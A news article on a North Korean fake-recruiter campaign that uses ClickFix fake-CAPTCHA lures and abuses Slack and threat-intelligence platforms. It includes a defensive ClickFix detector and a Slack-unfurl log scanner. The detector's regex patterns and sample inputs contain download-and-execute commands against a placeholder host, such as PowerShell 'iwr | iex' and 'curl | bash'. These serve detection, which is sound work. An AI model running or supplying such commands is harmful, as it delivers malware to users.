North Korean Hackers Pose as Recruiters To Launch Global Cyberattacks

North Korean hackers posed as recruiters to target blockchain and finance professionals, exploiting Slack and cyber intelligence platforms to steal cryptocurrency in a global campaign tracked by SentinelLabs.

    A new wave of cyberattacks tied to North Korea has been uncovered, with hackers posing as recruiters or job seekers to target professionals in blockchain, marketing, and finance. Between March and June 2025, at least 230 people were compromised, though researchers warn the true number of victims is much higher. The campaign, tracked by SentinelLabs, highlights how North Korean actors are abusing Western cyber intelligence platforms and collaboration tools like Slack to run coordinated attacks.

    Fake Recruiters Target Blockchain and Finance Professionals

    The primary lure used by the attackers is fake job recruitment. Victims receive messages inviting them to apply for lucrative positions, often related to blockchain roles. Once engaged, they are redirected to fraudulent websites where they face seemingly legitimate assessments.

    In reality, the assessment pages deliver malware through tactics such as a fake CAPTCHA. In this method, known as “ClickFix,” the page places a command on the visitor’s clipboard and instructs them to paste and run it, typically in the Windows Run dialog or a terminal, to “prove they are human.” Because the victim launches the command themselves, no file download has to get past the browser or an e-mail gateway. According to researchers, the attacks ultimately aim to steal cryptocurrency assets, a consistent priority for North Korean threat groups seeking to fund state projects under heavy sanctions.
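To make the ClickFix step concrete, the following Python script is an added example written for this article, not code from SentinelLabs or from the campaign. It scores command lines collected from Run-dialog or shell history against indicators typical of ClickFix pastes: a hidden-window or encoded PowerShell command, download-and-execute patterns, a remote URL, and the trailing “verification” comment that makes the paste look like a CAPTCHA step. The indicator set, weights and threshold are general assumptions about the technique, and the sample command lines are constructed for the demonstration.

```python
import re
from dataclasses import dataclass, field

# Heuristics for ClickFix-style pastes. On Windows the pasted command usually
# lands in the Run dialog history (HKCU\Software\Microsoft\Windows\
# CurrentVersion\Explorer\RunMRU) or in PowerShell history; on macOS/Linux in
# shell history. These indicators describe the technique in general; they are
# not taken from the SentinelLabs report, and the sample commands below are
# constructed for this example.
COMMON_TOOL_RE = re.compile(r"\b(powershell|pwsh|cmd|curl|wget)(\.exe)?\b", re.I)
RARE_LOLBIN_RE = re.compile(r"\b(mshta|certutil|bitsadmin|regsvr32|rundll32|msiexec)(\.exe)?\b", re.I)
ENCODED_RE = re.compile(r"-(?:e|ec|en|enc|encodedcommand)\s+[A-Za-z0-9+/=]{40,}", re.I)
EVASION_RE = re.compile(
    r"-(?:w|win|window|windowstyle)\s+hidden|-nop\b|-noprofile\b|-ep\s+bypass|executionpolicy\s+bypass", re.I)
DOWNLOAD_EXEC_RE = re.compile(
    r"\biex\b|invoke-expression|invoke-webrequest|\biwr\b|downloadstring|\b(curl|wget)\b[^|]*\|\s*(ba|z)?sh\b", re.I)
URL_RE = re.compile(r"https?://[^\s'\"]+", re.I)
# The trailing comment that makes the paste look like a CAPTCHA step to the victim.
LURE_COMMENT_RE = re.compile(r"#.*(not a robot|captcha|verif(y|ication)|human)", re.I)

# (pattern, weight, reason) - each indicator counts at most once per command.
WEIGHTS = [
    (COMMON_TOOL_RE, 1, "shell or download tool"),
    (RARE_LOLBIN_RE, 2, "LOLBin rarely typed by a user"),
    (ENCODED_RE, 2, "encoded command"),
    (EVASION_RE, 1, "hidden window / profile or policy bypass"),
    (DOWNLOAD_EXEC_RE, 2, "download-and-execute"),
    (URL_RE, 1, "remote URL"),
    (LURE_COMMENT_RE, 3, "CAPTCHA-style lure comment"),
]
THRESHOLD = 3  # assumed; tune against what admins in your environment actually type


@dataclass
class Verdict:
    command: str
    score: int = 0
    reasons: list[str] = field(default_factory=list)
    urls: list[str] = field(default_factory=list)

    @property
    def suspicious(self) -> bool:
        return self.score >= THRESHOLD


def score_command(cmd: str) -> Verdict:
    """Score one command line against the ClickFix indicators above."""
    verdict = Verdict(command=cmd)
    for pattern, weight, reason in WEIGHTS:
        if pattern.search(cmd):
            verdict.score += weight
            verdict.reasons.append(reason)
    verdict.urls = URL_RE.findall(cmd)  # staging URLs, for blocking or enrichment
    return verdict


def flag_clickfix(commands) -> list[Verdict]:
    """Return only the commands that cross the threshold, highest score first."""
    flagged = [v for v in map(score_command, commands) if v.suspicious]
    return sorted(flagged, key=lambda v: v.score, reverse=True)


# Constructed sample input: four ClickFix-style pastes followed by three benign commands.
SAMPLE_COMMANDS = [
    'powershell -w hidden -c "iwr https://example.invalid/verify.ps1 | iex" # "I am not a robot - reCAPTCHA Verification ID: 7812"',
    "mshta https://example.invalid/captcha.hta",
    "curl -s https://example.invalid/s | bash # Verification step 2 of 2",
    "powershell -nop -w hidden -enc QQBBAEEAQQBBAEEAQQBBAEEAQQBBAEEAQQBBAEEAQQBBAEEAQQBBAEEAQQBBAEEA",
    "powershell Get-Process",
    "git status",
    "curl https://example.invalid/file.tar.gz -o file.tar.gz",
]

if __name__ == "__main__":
    for v in flag_clickfix(SAMPLE_COMMANDS):
        print(f"[{v.score}] {v.command}")
        print(f"     reasons: {', '.join(v.reasons)}; urls: {v.urls}")
```

Run as-is, the script flags the four constructed pastes and leaves the plain PowerShell, git and curl-download commands alone; in practice the input would be RunMRU values or shell history pulled from endpoints, and the URLs it extracts are what you hand to the proxy or DNS team.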

    SentinelLabs observed that victims were widely distributed around the world, showing no regional bias in the hackers’ targeting.

    Expansion of the Contagious Interview Campaign

    This operation builds on the “Contagious Interview” campaign first observed in 2023 and linked to the Lazarus Group, a North Korean state-sponsored umbrella organization. Initially, the campaign relied on fake interviews and job offers to trick targets into running malicious code.

    Over time, it has evolved into a cluster of coordinated campaigns that draw on several social engineering techniques. The attackers are described as pragmatic: once a piece of their infrastructure is flagged or taken down, they tend to abandon it and stand up new assets rather than repair it, which keeps them moving quickly and shortens the useful life of any single indicator for defenders.

    As SentinelLabs explained:

    “Given the continuous success of their campaigns in engaging targets, it may be more pragmatic and efficient for the threat actors to deploy new infrastructure rather than maintain existing assets.”

    Abuse of Western Cyber Intelligence Platforms

    One of the most concerning revelations from the investigation is the way North Korean attackers use Western cyber intelligence tools against defenders. Logs accidentally exposed on their servers revealed heavy use of commercial cyber intelligence platforms.

    • Validin: A threat intelligence platform for infrastructure data such as domain and DNS history and published threat reports. The attackers used it to watch for their own infrastructure being flagged and to check the reputation of newly registered domains before putting them to use.
    • VirusTotal: Leveraged to see whether their malware samples had already been detected by security vendors.
    • Maltrail: An open-source resource listing malicious domains and IPs, repurposed by the hackers as an early warning system.

    SentinelLabs noted:

    “North Korean threat groups actively examine Cyber Threat Intelligence (CTI) information to identify threats to their operations and improve the resilience and effectiveness of their campaigns, depending on their operational priorities.”

    Despite using these tools, the attackers often displayed poor operational security. Researchers observed multiple instances of accidental exposure, such as misconfigured web root directories and leaked files, which helped investigators trace their infrastructure.

    Slack Bots Indicate Team-Based Operations

    Strong indicators suggest the attackers worked in teams using Slack for coordination. Researchers found requests from Slack’s bot (the one that fetches link previews) in logs for URLs tied to the malicious campaigns, which indicates that attack URLs and assets were being pasted into Slack and accessed in real time across the group.
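The Slack bot requests described above would appear in the web server logs of the attack infrastructure as fetches by Slack’s link-preview bot. As an added example (not SentinelLabs’ tooling; the article does not say which log fields the researchers examined), the Python below scans a standard combined-format access log using the user-agent string Slack documents for that bot, and reports which paths were posted to a chat platform, when, and which clients fetched the same path shortly afterwards. The log lines are constructed for the example, and the Discord and Telegram bot names are assumptions from general knowledge.

```python
import re
from datetime import datetime, timedelta

# Apache/Nginx "combined" access log format (assumed; the article does not say
# which log fields the researchers examined).
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>\S+) (?P<path>\S+) [^"]*" '
    r'(?P<status>\d{3}) \S+ "(?P<referer>[^"]*)" "(?P<ua>[^"]*)"$'
)

# Link-preview ("unfurl") bots of chat platforms, matched as substrings of the
# User-Agent. Slack's string is the one Slack documents at
# https://api.slack.com/robots; the others are from general knowledge.
PREVIEW_BOTS = {
    "Slackbot-LinkExpanding": "Slack",
    "Discordbot": "Discord",
    "TelegramBot": "Telegram",
}
# Fetches a preview bot makes regardless of which URL was shared.
NOISE_PATHS = {"/favicon.ico", "/robots.txt", "/apple-touch-icon.png"}


def parse_log(log_text):
    """Yield one dict per well-formed line, with 'time' as an aware datetime."""
    for line in log_text.splitlines():
        m = LOG_RE.match(line)
        if m:
            rec = m.groupdict()
            rec["time"] = datetime.strptime(rec["ts"], "%d/%b/%Y:%H:%M:%S %z")
            yield rec


def classify_ua(ua):
    """Return the chat platform whose preview bot sent this request, else None."""
    for marker, platform in PREVIEW_BOTS.items():
        if marker in ua:
            return platform
    return None


def find_chat_shares(log_text):
    """Each preview-bot fetch is evidence the URL was posted in that platform at about that time."""
    shares = []
    for rec in parse_log(log_text):
        platform = classify_ua(rec["ua"])
        if platform and rec["path"] not in NOISE_PATHS:
            shares.append({"platform": platform, "path": rec["path"],
                           "time": rec["time"], "bot_ip": rec["ip"]})
    return shares


def visitors_after_share(log_text, window=timedelta(minutes=5)):
    """Non-bot clients that fetched a shared path within `window` after the preview fetch.
    On attacker infrastructure these are the operators or victims who opened the posted link."""
    shares = find_chat_shares(log_text)
    hits = []
    for rec in parse_log(log_text):
        if classify_ua(rec["ua"]):
            continue
        for s in shares:
            delay = rec["time"] - s["time"]
            if rec["path"] == s["path"] and timedelta(0) <= delay <= window:
                hits.append({"ip": rec["ip"], "path": rec["path"], "platform": s["platform"],
                             "delay_s": int(delay.total_seconds())})
    return hits


# Constructed sample log: a lure page fetched by a browser, then unfurled by Slack,
# then opened by a second browser 86 seconds later; a job listing unfurled by Discord.
SAMPLE_LOG = """\
203.0.113.7 - - [12/May/2025:09:14:02 +0000] "GET /assess/captcha.html HTTP/1.1" 200 5120 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36"
198.51.100.23 - - [12/May/2025:09:14:05 +0000] "GET /assess/captcha.html HTTP/1.1" 200 5120 "-" "Slackbot-LinkExpanding 1.0 (+https://api.slack.com/robots)"
198.51.100.23 - - [12/May/2025:09:14:05 +0000] "GET /favicon.ico HTTP/1.1" 404 153 "-" "Slackbot-LinkExpanding 1.0 (+https://api.slack.com/robots)"
203.0.113.44 - - [12/May/2025:09:15:31 +0000] "GET /assess/captcha.html HTTP/1.1" 200 5120 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36"
192.0.2.9 - - [12/May/2025:11:02:17 +0000] "GET /jobs/senior-blockchain-dev HTTP/1.1" 200 8810 "-" "Mozilla/5.0 (compatible; Discordbot/2.0; +https://discordapp.com)"
"""

if __name__ == "__main__":
    for s in find_chat_shares(SAMPLE_LOG):
        print(f"{s['time']:%Y-%m-%d %H:%M:%S}  {s['path']} posted in {s['platform']}")
    for h in visitors_after_share(SAMPLE_LOG):
        print(f"  {h['ip']} opened {h['path']} {h['delay_s']}s after the {h['platform']} share")
```

The favicon fetch is dropped as noise because every preview bot makes it; what matters is the unfurl of the lure path itself, and the browser that opened the same path 86 seconds later is the kind of follow-on hit that ties a shared URL to a specific client.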

    This collaboration model allowed the hackers to scale quickly and react when parts of their infrastructure were disrupted. According to SentinelLabs, once service providers took down malicious assets, the attackers rapidly deployed replacements rather than modifying existing systems.

    The report points to pressure from revenue quotas imposed by the regime as a driver of this agility. Teams are incentivized to deliver results quickly rather than maintain long-term, coordinated infrastructure.

    Disruption of North Korean Infrastructure

    Through these exposed assets, researchers were able to take meaningful action. SentinelLabs identified fake recruitment websites, e-mail addresses, IP addresses and malware distribution servers, and worked with providers to get them taken down. The disruption is temporary, and it highlights the ongoing cat-and-mouse dynamic between defenders and North Korean actors.

    Despite these takedowns, the threat persists. SentinelLabs stressed that the scale of infrastructure and the adaptability of these attackers make it likely that new domains and services will emerge soon.

    For enterprises, the campaign demonstrates the growing sophistication of North Korean cyber operations. By abusing legitimate platforms such as Slack and threat intelligence services, attackers blur the line between normal business operations and malicious activity.

    Organizations in finance, blockchain, and technology sectors are at particular risk, but the global distribution of victims shows the threat extends to any professional who may be targeted with job offers.
